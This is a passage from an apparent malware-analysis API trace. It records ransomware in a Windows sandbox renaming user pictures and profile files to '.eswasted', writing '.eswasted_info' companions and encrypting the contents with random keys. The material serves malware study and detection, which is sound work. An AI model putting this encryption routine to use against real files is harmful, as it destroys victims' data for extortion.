HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.336] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.376] SetEndOfFile (hFile=0xfc) returned 1 [0080.376] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.376] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.376] lstrcpyW (in: lpString1=0x4ef772, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted")) returned 0 [0080.377] GetLastError () returned 0x20 [0080.377] CloseHandle (hObject=0xfc) returned 1 [0080.377] lstrcpyW (in: lpString1=0x4ef772, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.377] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.eswasted_info")) returned 1 [0080.378] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c0 | out: hHeap=0x4a0000) returned 1 [0080.379] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.379] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.380] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hLfS.gif") returned 51 [0080.380] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ef440 [0080.380] lstrcpyW (in: lpString1=0x4ef4a6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.380] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.380] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.380] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.381] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hLfS.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hlfs.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.381] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.382] SetEndOfFile (hFile=0xfc) returned 1 [0080.382] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.382] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.382] lstrcpyW (in: lpString1=0x4ef4a6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hLfS.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hlfs.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hLfS.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hlfs.gif.eswasted")) returned 1 [0080.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hLfS.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hlfs.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0080.384] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0080.386] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0080.387] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.387] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.387] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0080.387] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.387] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.396] SetEndOfFile (hFile=0xfc) returned 1 [0080.398] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.398] CloseHandle (hObject=0xfc) returned 1 [0080.400] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.400] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.400] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.400] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Jtx-hTh2Nli9FUNPYgYu.png") returned 67 [0080.401] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4ef440 [0080.401] lstrcpyW (in: lpString1=0x4ef4c6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.401] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.401] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.401] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.401] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Jtx-hTh2Nli9FUNPYgYu.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jtx-hth2nli9funpygyu.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.402] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.403] SetEndOfFile (hFile=0xfc) returned 1 [0080.403] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.403] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.403] lstrcpyW (in: lpString1=0x4ef4c6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Jtx-hTh2Nli9FUNPYgYu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jtx-hth2nli9funpygyu.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Jtx-hTh2Nli9FUNPYgYu.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jtx-hth2nli9funpygyu.png.eswasted")) returned 1 [0080.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Jtx-hTh2Nli9FUNPYgYu.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jtx-hth2nli9funpygyu.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0080.404] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0080.406] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0080.406] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.407] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.407] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0080.407] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.407] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.526] SetEndOfFile (hFile=0xfc) returned 1 [0080.529] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.529] CloseHandle (hObject=0xfc) returned 1 [0080.531] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.531] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.532] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.532] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.532] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tOK4hDrVwY-_Hc.jpg") returned 61 [0080.532] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ef440 [0080.532] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.532] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.532] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.533] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.533] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tOK4hDrVwY-_Hc.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tok4hdrvwy-_hc.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.533] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.534] SetEndOfFile (hFile=0xfc) returned 1 [0080.534] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.535] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.535] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tOK4hDrVwY-_Hc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tok4hdrvwy-_hc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tOK4hDrVwY-_Hc.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tok4hdrvwy-_hc.jpg.eswasted")) returned 1 [0080.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tOK4hDrVwY-_Hc.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tok4hdrvwy-_hc.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.538] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.539] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.540] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.540] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.540] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.541] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.541] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.549] SetEndOfFile (hFile=0xfc) returned 1 [0080.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.551] CloseHandle (hObject=0xfc) returned 1 [0080.552] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.553] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.553] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.553] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.553] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wTK31A1me.jpg") returned 56 [0080.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4ef440 [0080.554] lstrcpyW (in: lpString1=0x4ef4b0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.554] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.554] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.554] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wTK31A1me.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wtk31a1me.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.555] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.556] SetEndOfFile (hFile=0xfc) returned 1 [0080.556] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.556] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.556] lstrcpyW (in: lpString1=0x4ef4b0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wTK31A1me.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wtk31a1me.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wTK31A1me.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wtk31a1me.jpg.eswasted")) returned 1 [0080.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wTK31A1me.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wtk31a1me.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.557] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.559] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.560] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.560] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.560] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.561] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.561] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.569] SetEndOfFile (hFile=0xfc) returned 1 [0080.618] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.618] CloseHandle (hObject=0xfc) returned 1 [0080.620] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.621] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.621] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.621] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.621] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\FDBT5NNt9W8lKmc.jpg") returned 76 [0080.621] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d91a8 [0080.622] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.622] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.622] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.622] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.622] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\FDBT5NNt9W8lKmc.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\fdbt5nnt9w8lkmc.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.623] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.624] SetEndOfFile (hFile=0xfc) returned 1 [0080.624] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.624] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.624] lstrcpyW (in: lpString1=0x4d9240, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\FDBT5NNt9W8lKmc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\fdbt5nnt9w8lkmc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\FDBT5NNt9W8lKmc.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\fdbt5nnt9w8lkmc.jpg.eswasted")) returned 1 [0080.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\FDBT5NNt9W8lKmc.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\q_ebb\\fdbt5nnt9w8lkmc.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.625] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0080.627] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.627] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.627] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.627] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.628] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.628] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.636] SetEndOfFile (hFile=0xfc) returned 1 [0080.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.639] CloseHandle (hObject=0xfc) returned 1 [0080.641] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0080.641] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.641] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.641] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\LkrGX6.gif") returned 67 [0080.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4d91a8 [0080.642] lstrcpyW (in: lpString1=0x4d922e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.642] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.642] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 